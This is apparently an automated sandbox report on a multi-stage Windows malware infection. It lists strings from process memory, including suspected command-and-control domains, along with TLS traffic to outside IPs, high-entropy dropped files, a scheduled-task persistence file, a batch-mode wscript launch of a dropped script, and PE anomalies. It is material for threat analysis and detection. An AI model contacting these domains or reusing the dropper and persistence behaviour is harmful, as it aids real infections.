                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                              Source: 2R0700.exe, 00000005.00000003.1056011704.000000000549A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                              Source: 2R0700.exe, 00000005.00000003.1128700937.000000000070A000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.996560041.0000000000687000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/
                              Source: 2R0700.exe, 00000005.00000003.1146995840.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/Ky
                              Source: 2R0700.exe, 00000005.00000003.1208651372.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1209776216.00000000006F6000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208885485.00000000006F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/Ry
                              Source: 2R0700.exe, 00000005.00000003.1055278526.0000000005479000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.996393122.0000000000690000.00000004.00000020.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1146685669.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1208628837.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1146846803.0000000005463000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000002.1213395650.0000000005471000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055723819.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055565602.000000000547A000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1027935027.0000000005471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiaz
                              Source: 2R0700.exe, 00000005.00000003.1055278526.0000000005479000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055723819.000000000547B000.00000004.00000800.00020000.00000000.sdmp, 2R0700.exe, 00000005.00000003.1055565602.000000000547A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run/jUSiaz#
                              Source: 2R0700.exe, 00000005.00000003.996560041.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run:443/jUSiaz
                              Source: 2R0700.exe, 00000005.00000003.1127856691.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defaulemot.run:443/jUSiazal
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: pwHxMTy.exe, 0000002E.00000002.2028264200.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.to
                              Source: pwHxMTy.exe, 0000002E.00000002.2032481267.000000000375E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today/
                              Source: pwHxMTy.exe, 0000002E.00000002.2032481267.000000000375E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today/:
                              Source: pwHxMTy.exe, 0000002E.00000002.2024057928.000000000125F000.00000004.00000020.00020000.00000000.sdmp, pwHxMTy.exe, 0000002E.00000002.2026097250.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, pwHxMTy.exe, 0000002E.00000002.2026097250.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today/LksNAz
                              Source: pwHxMTy.exe, 0000002E.00000002.2032481267.000000000375E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today/wj
                              Source: pwHxMTy.exe, 0000002E.00000002.2024766595.0000000001267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today:443/LksNAz
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1466653409.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000003.1467145898.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                              Source: HmngBpR.exe, 00000010.00000002.1538813274.000000000797F000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1474903728.0000000009548000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1536082999.0000000009C72000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740247439.00000000058D5000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1883141499.0000000009911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                              Source: Seat.com, 00000022.00000003.1626880641.0000000004B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                              Source: 2R0700.exe, 00000005.00000003.999988309.00000000054BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                              Source: 2R0700.exe, 00000005.00000003.1057416409.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                              Source: 2R0700.exe, 00000005.00000003.1056980445.0000000005572000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49681 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49683 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49684 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49685 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49686 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49687 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49714 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49718 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49729 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 82.115.223.119:443 -> 192.168.2.7:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49759 version: TLS 1.2

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Writes many files with high entropy
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe entropy: 7.99094598516Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\packed[1].exe entropy: 7.99646905387Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10123540101\packed.exe entropy: 7.99646905387Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\ADFoyxP[1].exe entropy: 7.99051565952Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe entropy: 7.99051565952Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeFile created: C:\Users\user\AppData\Local\Temp\4e031b4c entropy: 7.9980280431Jump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\han entropy: 7.99464114977Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Argentina.pub entropy: 7.99765353495Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Distinguished.pub entropy: 7.99809266375Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Poem.pub entropy: 7.99733876431Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Governor.pub entropy: 7.99796220639Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Swingers.pub entropy: 7.99812528823Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Legislation.pub entropy: 7.99786443988Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Explicitly.pub entropy: 7.99686467774Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Comparison.pub entropy: 7.99674290091Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Enlarge.pub entropy: 7.99778287234Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Listening.pub entropy: 7.99720925196Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Gate.pub entropy: 7.9966611885Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Preference.pub entropy: 7.99684640346Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Apartments.pub entropy: 7.99764085482Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Republican.pub entropy: 7.99632178366Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Amenities.pub entropy: 7.99702026084Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Worcester.pub entropy: 7.99796554729Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Generating.pub entropy: 7.99807030539Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Regulation.pub entropy: 7.99630322854Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Performing.pub entropy: 7.99750792054Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Robert.pub entropy: 7.99725695551Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Maintains.pub entropy: 7.99814457245Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Document.pub entropy: 7.99688077856Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Confusion.pub entropy: 7.99759203123Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Reverse.pub entropy: 7.99813463449Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Vacation.pub entropy: 7.99753681116Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Vampire.pub entropy: 7.99666754967Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Blood.pub entropy: 7.99804267671Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Hell.pub entropy: 7.99698268184Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Breaks.pub entropy: 7.99810429407Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Concept.pub entropy: 7.99720276963Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Really.pub entropy: 7.99835078472Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Urban.pub entropy: 7.99778737709Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Trademarks.pub entropy: 7.99757414761Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Thousand.pub entropy: 7.99729046263Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Silly.pub entropy: 7.99829492948Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Both.pub entropy: 7.99806131353Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Users\user\AppData\Local\Temp\Bull.pub entropy: 7.99770447322Jump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\353090\m entropy: 7.99992399201Jump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comFile created: C:\Users\user\AppData\Local\TradeSecure Innovations\F entropy: 7.99992399201Jump to dropped file
                              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\uvwnwebboksg entropy: 7.99464114977Jump to dropped file

                              System Summary

                              barindex
                              PE file contains section with special chars
                              Source: 3E11p.exe.0.drStatic PE information: section name:
                              Source: 3E11p.exe.0.drStatic PE information: section name: .idata
                              Source: 3E11p.exe.0.drStatic PE information: section name:
                              Source: 1E08u3.exe.1.drStatic PE information: section name:
                              Source: 1E08u3.exe.1.drStatic PE information: section name: .idata
                              Source: 1E08u3.exe.1.drStatic PE information: section name:
                              Source: 2R0700.exe.1.drStatic PE information: section name:
                              Source: 2R0700.exe.1.drStatic PE information: section name: .idata
                              Source: rapes.exe.2.drStatic PE information: section name:
                              Source: rapes.exe.2.drStatic PE information: section name: .idata
                              Source: rapes.exe.2.drStatic PE information: section name:
                              Source: bncn6rv.exe.9.drStatic PE information: section name:
                              Source: bncn6rv.exe.9.drStatic PE information: section name: .rsrc
                              Source: bncn6rv.exe.9.drStatic PE information: section name: .idata
                              Source: bncn6rv.exe.9.drStatic PE information: section name:
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name:
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: .rsrc
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name: .idata
                              Source: bncn6rv[1].exe.9.drStatic PE information: section name:
                              Windows Scripting host queries suspicious COM object (likely to drop second stage)
                              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Wscript called in batch mode (surpress errors)
                              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeCode function: 16_2_0077A88F NtQuerySystemInformation,16_2_0077A88F
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00FA1F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00921F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00921F90
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile created: C:\Windows\Tasks\rapes.jobJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\PerfectlyFda
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\AccreditationShed
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\GovernmentsHighly
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\HighKerry
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\PracticalPrevent
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\FilenameWho
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeFile created: C:\Windows\UpdatedMakeup
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA3BA20_2_00FA3BA2
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA5C9E0_2_00FA5C9E
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00923BA21_2_00923BA2
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00925C9E1_2_00925C9E
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeCode function: 16_2_0077E57A16_2_0077E57A
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D601E0717_2_6D601E07
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60652817_2_6D606528
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6065EC17_2_6D6065EC
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60658C17_2_6D60658C
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60645817_2_6D606458
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D60642C17_2_6D60642C
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6014F217_2_6D6014F2
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6064CC17_2_6D6064CC
